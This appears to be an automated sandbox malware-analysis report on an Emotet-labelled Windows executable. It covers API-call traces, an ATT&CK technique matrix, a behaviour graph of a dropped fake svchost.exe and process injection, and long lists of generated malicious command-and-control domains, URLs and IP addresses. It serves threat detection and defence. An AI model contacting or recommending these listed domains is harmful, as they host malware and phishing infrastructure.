Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A388F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,9_2_00A388F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4F4A0 htons,socket,setsockopt,closesocket,bind,listen,9_2_00A4F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4E6D0 setsockopt,htons,socket,setsockopt,bind,9_2_00A4E6D0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		22
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		111
Input Capture		2
System Time Discovery		1
Remote Desktop Protocol		1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Create Account		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory11
Account Discovery		Remote Desktop Protocol1
Screen Capture		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Valid Accounts		1
Valid Accounts		1
Obfuscated Files or Information		Security Account Manager1
System Network Connections Discovery		SMB/Windows Admin Shares111
Input Capture		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job		1
Access Token Manipulation		31
Software Packing		NTDS2
File and Directory Discovery		Distributed Component Object Model2
Clipboard Data		1
Remote Access Software		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		613
Process Injection		1
DLL Side-Loading		LSA Secrets143
System Information Discovery		SSHKeylogging3
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Bootkit		1
Scheduled Task/Job		322
Masquerading		Cached Domain Credentials1
Query Registry		VNCGUI Input Capture14
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		1
Valid Accounts		DCSync351
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem151
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow13
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Bootkit		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553852 Sample: UMwpXhA46R.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 49 deliver.trafficmotor.com 2->49 51 zz1985.qu200.com 2->51 53 1012 other IPs or domains 2->53 67 Suricata IDS alerts for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for URL or domain 2->71 73 18 other signatures 2->73 9 UMwpXhA46R.exe 2 3 2->9         started        signatures3 process4 file5 37 C:\Windows\apppatch\svchost.exe, PE32 9->37 dropped 39 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->39 dropped 75 Detected unpacking (changes PE section rights) 9->75 77 Detected unpacking (overwrites its own PE header) 9->77 79 Moves itself to temp directory 9->79 81 8 other signatures 9->81 13 svchost.exe 2 85 9->13         started        signatures6 process7 dnsIp8 55 vojycit.com 13->55 57 qexyhap.com 13->57 59 27 other IPs or domains 13->59 83 System process connects to network (likely due to code injection or exploit) 13->83 85 Detected unpacking (changes PE section rights) 13->85 87 Detected unpacking (overwrites its own PE header) 13->87 89 16 other signatures 13->89 17 PMnAVsjMPucERAKEWNFImySCFHoLk.exe 13->17 injected 21 PMnAVsjMPucERAKEWNFImySCFHoLk.exe 13->21 injected 23 PMnAVsjMPucERAKEWNFImySCFHoLk.exe 13->23 injected 25 10 other processes 13->25 signatures9 process10 dnsIp11 41 vojyduf.com 17->41 61 Monitors registry run keys for changes 17->61 63 Contains VNC / remote desktop functionality (version string found) 17->63 65 Found direct / indirect Syscall (likely to bypass EDR) 17->65 27 WerFault.exe 21->27         started        43 162.255.119.102, 50243, 52124, 53772 NAMECHEAP-NETUS United States 25->43 45 178.162.203.226, 50219, 50244, 52125 LEASEWEB-DE-FRA-10DE Germany 25->45 47 2 other IPs or domains 25->47 29 WerFault.exe 25->29         started        31 WerFault.exe 25->31         started        33 WerFault.exe 25->33         started        35 6 other processes 25->35 signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
UMwpXhA46R.exe82%ReversingLabsWin32.Trojan.Emotet
UMwpXhA46R.exe100%AviraTR/Crypt.XPACK.Gen
UMwpXhA46R.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://qedysov.com/login.php100%Avira URL Cloudmalware
http://qekyqoq.com/login.php100%Avira URL Cloudmalware
http://qexyfuq.com/pg100%Avira URL Cloudmalware
http://qedysol.com/login.php100%Avira URL Cloudmalware
http://vopycoc.com/login.php100%Avira URL Cloudmalware
http://pumywug.com/100%Avira URL Cloudphishing
http://qeqykop.com/login.php100%Avira URL Cloudmalware
http://vocyzek.com/http://gatyviw.com/100%Avira URL Cloudmalware
http://qetyvil.com/H100%Avira URL Cloudmalware
http://volyjym.com/login.php100%Avira URL Cloudmalware
http://gadycew.com/login.php100%Avira URL Cloudmalware
http://vocyjet.com/login.php100%Avira URL Cloudmalware
http://qeqyxov.com/login.php100%Avira URL Cloudmalware
http://puzylyp.com/login.php100%Avira URL Cloudmalware
http://lykyfud.com/login.php100%Avira URL Cloudmalware
http://lyxyvyn.com/login.php100%Avira URL Cloudmalware
http://galyvuz.com/login.php100%Avira URL Cloudmalware
http://lyrywoj.com/login.php100%Avira URL Cloudmalware
http://vowyrif.com/login.php100%Avira URL Cloudmalware
http://lymyvin.com/100%Avira URL Cloudmalware
http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63b100%Avira URL Cloudmalware
http://vocyruk.com/login.php100%Avira URL Cloudphishing
http://lyryman.com/login.php100%Avira URL Cloudmalware
http://lyvysur.com/login.php100%Avira URL Cloudmalware
http://vowypim.com/login.php100%Avira URL Cloudmalware
http://qexyfuq.com/login.php100%Avira URL Cloudmalware
http://vofypam.com/http://pujycyp.com/http://volydyk.com/http://pujycyp.com/http://qetyrul.com/http:100%Avira URL Cloudmalware
http://lyvymej.com/login.php100%Avira URL Cloudmalware
http://qebyqeq.com/login.php100%Avira URL Cloudmalware
http://lyryled.com/login.php100%Avira URL Cloudmalware
http://vojygok.com/login.php100%Avira URL Cloudmalware
http://www.google.comt.40%Avira URL Cloudsafe
http://gahyvab.com/login.php100%Avira URL Cloudmalware
http://qekysip.com/100%Avira URL Cloudmalware
http://lyryjir.com/login.php100%Avira URL Cloudmalware
http://puzymup.com/login.php100%Avira URL Cloudmalware
http://galydyw.com/login.php100%Avira URL Cloudmalware
http://pujycil.com/login.php100%Avira URL Cloudmalware
http://pumycug.com/100%Avira URL Cloudmalware
http://vojyduf.com/login.php100%Avira URL Cloudmalware
http://lysytoj.com/login.php100%Avira URL Cloudmalware
http://qedynaq.com/login.php//vofymem.com/0%Avira URL Cloudsafe
http://pupycuv.com/login.php100%Avira URL Cloudmalware
http://qetynev.com/login.php0%Avira URL Cloudsafe
http://qetykyq.com/login.php100%Avira URL Cloudmalware
http://gatykyh.com/login.php100%Avira URL Cloudmalware
http://vofypam.com/login.php100%Avira URL Cloudmalware
http://gadyniw.com/login.php100%Avira URL Cloudmalware
http://pupywyv.com/login.php100%Avira URL Cloudphishing
http://lygyxux.com/login.php100%Avira URL Cloudmalware
http://puzybil.com/login.php0%Avira URL Cloudsafe
http://volygoc.com/100%Avira URL Cloudmalware
https://puzylyp.com/login.php100%Avira URL Cloudmalware
http://lyvynid.com/login.php100%Avira URL Cloudmalware
http://www.google.comtQ20%Avira URL Cloudsafe
http://vojybim.com/login.php100%Avira URL Cloudphishing
http://gadydow.com/login.php100%Avira URL Cloudmalware
http://qeqyxyp.com/login.php100%Avira URL Cloudmalware
http://lysyxar.com/login.php100%Avira URL Cloudmalware
http://lyxygax.com/login.php100%Avira URL Cloudmalware
http://vopykum.com/login.php100%Avira URL Cloudmalware
http://pumyjip.com/login.php100%Avira URL Cloudmalware
http://lygyjuj.com/login.php100%Avira URL Cloudmalware
http://ganyfuz.com/login.phpE100%Avira URL Cloudmalware
http://puvygyv.com/login.php100%Avira URL Cloudmalware
http://pupygel.com/100%Avira URL Cloudmalware
http://qekyqop.com/login.php100%Avira URL Cloudmalware
http://gahydyb.com/100%Avira URL Cloudmalware
http://purymog.com/http://qegylul.com/http://lyryman.com/P100%Avira URL Cloudmalware
http://lyxyxox.com/login.php100%Avira URL Cloudmalware
http://volyquk.com/login.php100%Avira URL Cloudmalware
http://lymyxex.com/login.php100%Avira URL Cloudmalware
http://vonypic.com/login.php100%Avira URL Cloudmalware
http://volyjif.com/login.php100%Avira URL Cloudmalware
http://lysysyx.com/login.php100%Avira URL Cloudmalware
http://puzyxip.com/login.php100%Avira URL Cloudmalware
http://pumyxiv.com/login.php100%Avira URL Cloudmalware
http://vofydak.com/login.php100%Avira URL Cloudmalware
http://qedysyp.com/login.php100%Avira URL Cloudphishing
http://gahyvuh.com/login.php100%Avira URL Cloudmalware
http://puzyduq.com/login.php100%Avira URL Cloudmalware
http://puzydal.com/login.php100%Avira URL Cloudmalware
http://qegyhig.com/login.phpY100%Avira URL Cloudmalware
http://106.15.232.163/H0%Avira URL Cloudsafe
http://lyxysad.com/login.php100%Avira URL Cloudmalware
http://gahyhys.com/login.php100%Avira URL Cloudmalware
http://purywyl.com/login.php100%Avira URL Cloudmalware
http://www.google.comtK60%Avira URL Cloudsafe
http://vojyzik.com/login.php100%Avira URL Cloudmalware
http://lykyjad.com/login.php100%Avira URL Cloudmalware
http://vojycec.com/login.php100%Avira URL Cloudmalware
http://galyfis.com/100%Avira URL Cloudmalware
http://lymymax.com/H100%Avira URL Cloudmalware
http://lyryvur.com/login.php100%Avira URL Cloudmalware
http://volydot.com/login.php100%Avira URL Cloudphishing
http://pujygug.com/login.php100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pupydeq.com
13.248.169.48
truefalse
    		high
    pupycag.com
    		18.208.156.248
    		truefalse
      		high
      lyvyxor.com
      		208.100.26.245
      		truefalse
        		high
        77026.bodis.com
        		199.59.243.227
        		truefalse
          		high
          lysyvan.com
          		188.114.97.3
          		truefalse
            		high
            galynuh.com
            		64.225.91.73
            		truefalse
              		high
              parkingpage.namecheap.com
              		91.195.240.19
              		truefalse
                		high
                qegyhig.com
                		188.114.96.3
                		truefalse
                  		high
                  gatyfus.com
                  		85.17.31.122
                  		truefalse
                    		high
                    vonypom.com
                    		18.208.156.248
                    		truefalse
                      		high
                      puzylyp.com
                      		75.2.71.199
                      		truefalse
                        		high
                        qexyhuv.com
                        		76.223.67.189
                        		truefalse
                          		high
                          77980.bodis.com
                          		199.59.243.227
                          		truefalse
                            		high
                            pltraffic7.com
                            		72.52.179.174
                            		truefalse
                              		high
                              gadyciz.com
                              		44.221.84.105
                              		truefalse
                                		high
                                deliver.trafficmotor.com
                                		45.79.19.196
                                		truetrue
                                  		unknown
                                  gadyniw.com
                                  		154.212.231.82
                                  		truefalse
                                    		high
                                    lyxynyx.com
                                    		103.224.212.210
                                    		truefalse
                                      		high
                                      www.sedoparking.com
                                      		64.190.63.136
                                      		truefalse
                                        		high
                                        lygyvuj.com
                                        		52.34.198.229
                                        		truefalse
                                          		high
                                          lygynud.com
                                          		3.94.10.34
                                          		truefalse
                                            		high
                                            gahyqah.com
                                            		23.253.46.64
                                            		truefalse
                                              		high
                                              sedoparking.com
                                              		64.190.63.136
                                              		truefalse
                                                		high
                                                vocyzit.com
                                                		44.221.84.105
                                                		truefalse
                                                  		high
                                                  galyqaz.com
                                                  		199.191.50.83
                                                  		truefalse
                                                    		high
                                                    vofycot.com
                                                    		103.224.182.252
                                                    		truefalse
                                                      		high
                                                      qetyhyg.com
                                                      		64.225.91.73
                                                      		truefalse
                                                        		high
                                                        gahyhiz.com
                                                        		44.221.84.105
                                                        		truefalse
                                                          		high
                                                          qetyfuv.com
                                                          		44.221.84.105
                                                          		truefalse
                                                            		high
                                                            gtm-sg-6l13ukk0m05.qu200.com
                                                            		103.150.10.48
                                                            		truefalse
                                                              		high
                                                              lymyxid.com
                                                              		3.94.10.34
                                                              		truefalse
                                                                		high
                                                                qegyval.com
                                                                		154.85.183.50
                                                                		truefalse
                                                                  		high
                                                                  gatyzoz.com
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    lykygaj.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high
                                                                      qedyxel.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		high
                                                                        qedyqup.com
                                                                        		unknown
                                                                        		unknownfalse
                                                                          		high
                                                                          qekyluv.com
                                                                          		unknown
                                                                          		unknownfalse
                                                                            		high
                                                                            gatyrez.com
                                                                            		unknown
                                                                            		unknownfalse
                                                                              		high
                                                                              vofybic.com
                                                                              		unknown
                                                                              		unknownfalse
                                                                                		high
                                                                                pujydag.com
                                                                                		unknown
                                                                                		unknownfalse
                                                                                  		high
                                                                                  vojykom.com
                                                                                  		unknown
                                                                                  		unknownfalse
                                                                                    		high
                                                                                    qetysuq.com
                                                                                    		unknown
                                                                                    		unknownfalse
                                                                                      		high
                                                                                      vonyzut.com
                                                                                      		unknown
                                                                                      		unknownfalse
                                                                                        		high
                                                                                        pufyjuq.com
                                                                                        		unknown
                                                                                        		unknownfalse
                                                                                          		high
                                                                                          pujytug.com
                                                                                          		unknown
                                                                                          		unknownfalse
                                                                                            		high
                                                                                            galyhiw.com
                                                                                            		unknown
                                                                                            		unknownfalse
                                                                                              		high
                                                                                              lykygun.com
                                                                                              		unknown
                                                                                              		unknownfalse
                                                                                                		high
                                                                                                vopymyc.com
                                                                                                		unknown
                                                                                                		unknownfalse
                                                                                                  		high
                                                                                                  gatyfaz.com
                                                                                                  		unknown
                                                                                                  		unknownfalse
                                                                                                    		high
                                                                                                    vojycit.com
                                                                                                    		unknown
                                                                                                    		unknownfalse
                                                                                                      		high
                                                                                                      lyvymej.com
                                                                                                      		unknown
                                                                                                      		unknownfalse
                                                                                                        		high
                                                                                                        lygyvar.com
                                                                                                        		unknown
                                                                                                        		unknownfalse
                                                                                                          		high
                                                                                                          purygiv.com
                                                                                                          		unknown
                                                                                                          		unknownfalse
                                                                                                            		high
                                                                                                            gahykeb.com
                                                                                                            		unknown
                                                                                                            		unknownfalse
                                                                                                              		high
                                                                                                              purymog.com
                                                                                                              		unknown
                                                                                                              		unknownfalse
                                                                                                                		high
                                                                                                                gadyzib.com
                                                                                                                		unknown
                                                                                                                		unknownfalse
                                                                                                                  		high
                                                                                                                  ganyqow.com
                                                                                                                  		unknown
                                                                                                                  		unknownfalse
                                                                                                                    		high
                                                                                                                    lyxysun.com
                                                                                                                    		unknown
                                                                                                                    		unknownfalse
                                                                                                                      		high
                                                                                                                      puzyjyg.com
                                                                                                                      		unknown
                                                                                                                      		unknownfalse
                                                                                                                        		high
                                                                                                                        vopydek.com
                                                                                                                        		unknown
                                                                                                                        		unknownfalse
                                                                                                                          		high
                                                                                                                          qexyfuq.com
                                                                                                                          		unknown
                                                                                                                          		unknownfalse
                                                                                                                            		high
                                                                                                                            gatykyh.com
                                                                                                                            		unknown
                                                                                                                            		unknownfalse
                                                                                                                              		high
                                                                                                                              vocykem.com
                                                                                                                              		unknown
                                                                                                                              		unknownfalse
                                                                                                                                		high
                                                                                                                                gahynus.com
                                                                                                                                		unknown
                                                                                                                                		unknownfalse
                                                                                                                                  		high
                                                                                                                                  pumypop.com
                                                                                                                                  		unknown
                                                                                                                                  		unknownfalse
                                                                                                                                    		high
                                                                                                                                    lyvysur.com
                                                                                                                                    		unknown
                                                                                                                                    		unknownfalse
                                                                                                                                      		high
                                                                                                                                      galypob.com
                                                                                                                                      		unknown
                                                                                                                                      		unknownfalse
                                                                                                                                        		high
                                                                                                                                        puzypav.com
                                                                                                                                        		unknown
                                                                                                                                        		unknownfalse
                                                                                                                                          		high
                                                                                                                                          gacyqoz.com
                                                                                                                                          		unknown
                                                                                                                                          		unknownfalse
                                                                                                                                            		high
                                                                                                                                            lykywid.com
                                                                                                                                            		unknown
                                                                                                                                            		unknownfalse
                                                                                                                                              		high
                                                                                                                                              lykytin.com
                                                                                                                                              		unknown
                                                                                                                                              		unknownfalse
                                                                                                                                                		high
                                                                                                                                                vofyref.com
                                                                                                                                                		unknown
                                                                                                                                                		unknownfalse
                                                                                                                                                  		high
                                                                                                                                                  qekytig.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknownfalse
                                                                                                                                                    		high
                                                                                                                                                    vocyzek.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknownfalse
                                                                                                                                                      		high
                                                                                                                                                      puvypoq.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknownfalse
                                                                                                                                                        		high
                                                                                                                                                        puvybeg.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknownfalse
                                                                                                                                                          		high
                                                                                                                                                          pupydig.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknownfalse
                                                                                                                                                            		high
                                                                                                                                                            pupyguq.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknownfalse
                                                                                                                                                              		high
                                                                                                                                                              qedyqal.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknownfalse
                                                                                                                                                                		high
                                                                                                                                                                vowymom.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknownfalse
                                                                                                                                                                  		high
                                                                                                                                                                  purypol.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknownfalse
                                                                                                                                                                    		high
                                                                                                                                                                    ganypeb.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknownfalse
                                                                                                                                                                      		high
                                                                                                                                                                      vopymit.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknownfalse
                                                                                                                                                                        		high
                                                                                                                                                                        vowyguf.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknownfalse
                                                                                                                                                                          		high
                                                                                                                                                                          pupytiq.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknownfalse
                                                                                                                                                                            		high
                                                                                                                                                                            lymyfoj.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknownfalse
                                                                                                                                                                              		high
                                                                                                                                                                              vowyzuf.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknownfalse
                                                                                                                                                                                		high
                                                                                                                                                                                gatyruw.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknownfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  qebynyg.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknownfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    puzymev.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknownfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      pupymol.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknownfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        vojycif.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknownfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          qebyvyl.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknownfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            lymysan.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknownfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              qekynuq.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknownfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                puryjil.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknownfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  puvytuv.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknownfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    galyzus.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknownfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      gadyfuh.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknownfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        vofycyk.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknownfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          Contacted URLs

                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://ww16.vofycot.com/login.php?sub1=20241112-0450-397d-84b8-860db74cb63btrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://puzylyp.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyqaz.com/login.phpfalse
                                                                                                                                                                                                            		high

                                                                                                                                                                                                            URLs from Memory and Binaries

                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            http://vocyzek.com/http://gatyviw.com/svchost.exe, 00000002.00000003.2587482853.00000000033CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumywug.com/svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347450056.000000000338B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedysov.com/login.phpsvchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyvil.com/Hsvchost.exe, 00000002.00000003.2612263098.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578250611.00000000040F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585897260.00000000040F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekyqoq.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375772840.0000000003361000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381004146.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376920856.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volyjym.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedysol.com/login.phpsvchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqykop.com/login.phpsvchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexyfuq.com/pgsvchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
